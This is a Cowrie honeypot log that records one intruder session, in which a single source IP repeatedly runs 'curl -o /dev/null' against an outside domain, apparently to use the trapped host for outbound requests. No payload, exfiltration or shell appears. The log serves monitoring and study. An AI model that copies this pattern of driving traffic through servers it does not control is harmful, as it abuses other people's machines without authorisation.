{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.170182Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.206987Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.208580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.246325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.247667Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.285338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.286617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.323744Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.324984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.361761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.363017Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.399997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.401043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.439063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.440285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.487123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.488419Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.525690Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.527383Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.565382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.566422Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.602939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.604156Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.641789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.643039Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.825635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.826848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.863698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.864949Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.905263Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.906335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.945823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.947076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:10.986208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:10.987642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.052540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.053741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.190956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.192016Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.288024Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.289351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.325716Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.326835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.364167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.365237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.402330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.403329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.439880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.440896Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.479864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.481089Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.519505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.520659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.557334Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.558572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.605973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.607516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.645314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.646537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.684254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.685447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.731533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.733146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.777649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.778792Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.844370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.845727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.888412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.889902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.927998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.929333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:11.968601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:11.969734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.031539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.033105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.087247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.088425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.127432Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.128533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.168297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.169351Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.205989Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.207062Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.246007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.247188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.284523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.285642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.323388Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.324412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.361054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.363274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.405858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.407007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.448936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.449998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.498258Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.500229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.537611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.538867Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.576624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.577879Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.672932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.674363Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.713011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.714094Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.750745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.751844Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.789317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.790771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.828328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.829435Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.867208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.868303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.906639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.907685Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.954623Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.955810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:12.995528Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:12.996653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.040679Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.041803Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.078863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.079932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.116876Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.117903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.159252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.160404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.196816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:13.197994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:13.234780Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
